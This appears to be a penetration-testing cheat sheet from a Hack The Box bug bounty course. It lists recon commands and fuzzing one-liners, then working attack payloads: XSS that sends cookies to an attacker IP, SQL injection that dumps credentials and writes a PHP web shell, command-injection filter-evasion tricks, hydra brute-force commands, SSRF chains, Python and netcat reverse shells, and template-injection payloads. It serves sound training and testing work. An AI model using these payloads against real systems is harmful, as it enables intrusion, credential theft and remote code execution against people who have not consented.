CBBH

nslookup <target>

Identify A record for the target domain.

export TARGET="domain.tld"

Assign target to an environment variable.

whois $TARGET

WHOIS lookup for the target.

nslookup $TARGET

Identify the A record for the target domain.

nslookup -query=A $TARGET

Identify the A record for the target domain.

dig <TARGET> @<nameserver/IP>

Identify the A record for the target domain.

dig a $TARGET @<nameserver/IP>

Identify the A record for the target domain.

nslookup -query=PTR <IP>

Identify the PTR record for the target IP address.

dig -x <IP> @<nameserver/IP>

Identify the PTR record for the target IP address.

nslookup -query=ANY $TARGET

Identify ANY records for the target domain.

dig any $TARGET @<nameserver/IP>

Identify ANY records for the target domain.

nslookup -query=TXT $TARGET

Identify the TXT records for the target domain.

dig txt $TARGET @<nameserver/IP>

Identify the TXT records for the target domain.

nslookup -query=MX $TARGET

Identify the MX records for the target domain.

dig mx $TARGET @<nameserver/IP>

Identify the MX records for the target domain.

VirusTotal

https://www.virustotal.com/gui/home/url

Censys

https://censys.io/

Crt.sh

https://crt.sh/

curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' sort -u

All subdomains for a given domain.

curl -s https://sonar.omnisint.io/tlds/{domain} jq -r '.[]' sort -u

All TLDs found for a given domain.

curl -s https://sonar.omnisint.io/all/{domain} jq -r '.[]' sort -u

All results across all TLDs for a given domain.

curl -s https://sonar.omnisint.io/reverse/{ip} jq -r '.[]' sort -u

Reverse DNS lookup on IP address.

curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} jq -r '.[]' sort -u

Reverse DNS lookup of a CIDR range.

curl -s "https://crt.sh/?q=${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u

Netcraft

https://www.netcraft.com/

WayBackMachine

http://web.archive.org/

WayBackURLs

https://github.com/tomnomnom/waybackurls

waybackurls -dates https://$TARGET > waybackurls.txt

Crawling URLs from a domain with the date it was obtained.

curl -I "http://${TARGET}"

Display HTTP headers of the target webserver.

whatweb -a https://www.facebook.com -v

Technology identification.

Wappalyzer

https://www.wappalyzer.com/

wafw00f -v https://$TARGET

WAF Fingerprinting.

Aquatone

https://github.com/michenriksen/aquatone

cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000

Makes screenshots of all subdomains in the

subdomain.list.

HackerTarget

https://hackertarget.com/zone-transfer/

SecLists

https://github.com/danielmiessler/SecLists

nslookup -type=any -query=AXFR $TARGET nameserver.target.domain

Zone Transfer using Nslookup against the target domain and its nameserver.

gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"

Bruteforcing subdomains.

curl -s http://192.168.10.10 -H "Host: randomtarget.com"

Changing the HOST HTTP header to request a specific domain.

cat ./vhosts.list while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" | grep "Content-Length: ";done

Bruteforcing for possible virtual hosts on the target domain.

ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612

Bruteforcing for possible virtual hosts on the target domain using ffuf.

ZAP

https://www.zaproxy.org/

ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

Discovering files and folders that cannot be spotted by browsing the website.

ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS

Mutated bruteforcing against the target web server.

JS Console Prettier

Beautifier

JSNice

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script>document.body.style.background = "#141d2b"</script>

Change Background Color

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change Background Image

<script>document.title = 'HackTheBox Academy'</script>

Change Website Title

<script>document.getElementsByTagName('body')\[0].innerHTML = 'text'</script>

Overwrite website's main body

<script>document.getElementById('urlform').remove();</script>

Remove certain HTML element

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

mysql -u root -h docker.hackthebox.eu -P 3306 -p

login to mysql database

SHOW DATABASES

List available databases

USE users

Switch to database

CREATE TABLE logins (id INT, ...)

Add a new table

SHOW TABLES

List available tables in current database

DESCRIBE logins

Show table properties and columns

INSERT INTO table_name VALUES (value_1,..)

Add values to table

INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)

Add values to specific columns in a table

UPDATE table_name SET column1=newvalue1, ... WHERE <condition>

Update table values

SELECT * FROM table_name

Show all columns in a table

SELECT column1, column2 FROM table_name

Show specific columns in a table

DROP TABLE logins

Delete a table

ALTER TABLE logins ADD newColumn INT

Add new column

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn

Rename column

ALTER TABLE logins MODIFY oldColumn DATE

Change column datatype

ALTER TABLE logins DROP oldColumn

Delete column

SELECT * FROM logins ORDER BY column_1

Sort by column

SELECT * FROM logins ORDER BY column_1 DESC

Sort by column in descending order

SELECT * FROM logins ORDER BY column_1 DESC, id ASC

Sort by two-columns

SELECT * FROM logins LIMIT 2

Only show first two results

SELECT * FROM logins LIMIT 1, 2

Only show first two results starting from index 2

SELECT * FROM table_name WHERE <condition>

List results that meet a condition

SELECT * FROM logins WHERE username LIKE 'admin%'

List results where the name is similar to a given string

admin' or '1'='1

Basic Auth Bypass

admin')-- -

Basic Auth Bypass With comments

' order by 1-- -

Detect number of columns using order by

cn' UNION select 1,2,3-- -

Detect number of columns using Union injection

cn' UNION select 1,@@version,3,4-- -

Basic Union injection

UNION select username, 2, 3, 4 from passwords-- -

Union injection for 4 columns

SELECT @@version

Fingerprint MySQL with query output

SELECT SLEEP(5)

Fingerprint MySQL with no output

cn' UNION select 1,database(),2,3-- -

Current database name

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

List all databases

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

List all tables in a specific database

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

List all columns in a specific table

cn' UNION select 1, username, password, 4 from dev.credentials-- -

Dump data from a table in another database

cn' UNION SELECT 1, user(), 3, 4-- -

Find current user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

Find if user has admin privileges

cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

Find if all user privileges

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Find which directories can be accessed through MySQL

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Read local file

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

Write a string to a local file

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Write a web shell into the base web directory

Semicolon

;

%3b

Both

New Line

\n

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

OR

||

%7c%7c

Second (only if first fails)

Sub-Shell

``

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

printenv

Can be used to view all environment variables

%09

Using tabs instead of spaces

${IFS}

Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

{ls,-la}

Commas will be replaced with spaces

${PATH:0:1}

Will be replaced with /

${LS_COLORS:10:1}

Will be replaced with ;

$(tr '!-}' '"-~'<<<[)

Shift character by one ([ -> )

' or "

Total must be even

$@ or \

Linux only

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Execute command regardless of cases

$(a="WhOaMi";printf %s "${a,,}")

Another variation of the technique

echo 'whoami' | rev

Reverse a string

$(rev<<<'imaohw')

Execute reversed command

echo -n 'cat /etc/passwd

grep 33' | base64 Encode a string with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Execute b64 encoded string

%09

Using tabs instead of spaces

%PROGRAMFILES:~10,-5%

Will be replaced with a space - (CMD)

$env:PROGRAMFILES\[10]

Will be replaced with a space - (PowerShell)

%HOMEPATH:~0,-17%

Will be replaced with \ - (CMD)

$env:HOMEPATH\[0]

Will be replaced with \ - (PowerShell)

' or "

Total must be even

^

Windows only (CMD)

WhoAmi

Simply send the character with odd cases

"whoami"\[-1..-20] -join ''

Reverse a string

iex "$('imaohw'\[-1..-20] -join '')"

Execute reversed command

[Convert]::ToBase64String(\[System.Text.Encoding]::Unicode.GetBytes('whoami'))

Encode a string with base64

iex "$(\[System.Text.Encoding]::Unicode.GetString(\[System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Execute b64 encoded string

hydra -C wordlist.txt SERVER_IP -s PORT http-get /

Basic Auth Brute Force - Combined Wordlist

hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /

Basic Auth Brute Force - User/Pass Wordlists

hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

Login Form Brute Force - Static User, Pass Wordlist

hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4

SSH Brute Force - User/Pass Wordlists

hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1

FTP Brute Force - Static User, Pass Wordlist

cupp -i

Creating Custom Password Wordlist

sed -ri '/^.{,7}$/d' william.txt

Remove Passwords Shorter Than 8

sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt

Remove Passwords With No Special Chars

sed -ri '/[0-9]+/!d' william.txt

Remove Passwords With No Numbers

./username-anarchy Bill Gates > bill.txt

Generate Usernames List

curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"

Testing for SSRF vulnerability

python3 -m http.server 9090

Starting the python web server

sudo pip3 install twisted

Installing the ftp server

sudo python3 -m twisted ftp -p 21 -r .

Starting the ftp server

curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"

Retrieving a remote file through the target application (HTTP Schema)

curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"

Retrieving a local file through the target application (File Schema)

for port in {1..65535};do echo $port >> ports.txt;done

Generating a wordlist of possible ports

ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30

Fuzzing for ports on the internal interface

curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"

Interacting with the internal interface on the discovered port

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"

Interacting with the internal application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"

Discovering web application listening in on localhost

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"

Modifying the URL to bypass the error message

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -

Requesting to disclose the /proc/self/environ file on the internal application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"

Retrieving a local file through the target application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"

Confirming remote code exeuction on the remote host

sudo apt-get install jq

Installing jq

nc -lvnp 9090

Starting a netcat listener

echo "\<B64 encoded response>" | base64 -d

Decoding the base64 encoded response

export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));\[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Reverse shell payload (to be URL encoded twice)

<!--#echo var="DATE_LOCAL" -->

Date

<!--#printenv -->

All variables

<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" -->

Reverse Shell

curl -X POST -d 'email=${7*7}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Spring payload)

curl -X POST -d 'email={{_self.env.display("TEST"}}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Twig payload)

curl -X POST -d 'email={{config.items()}}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Jinja2 basic injection)

curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Jinja2 dump all classes payload)

curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Tornado payload)

curl -gs "http://<TARGET IP>:<PORT>/execute?cmd={{7*'7'}}"

Interacting with the remote target (Confirming Jinja2 backend)

./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'

Automating the templating engine identification process with tplmap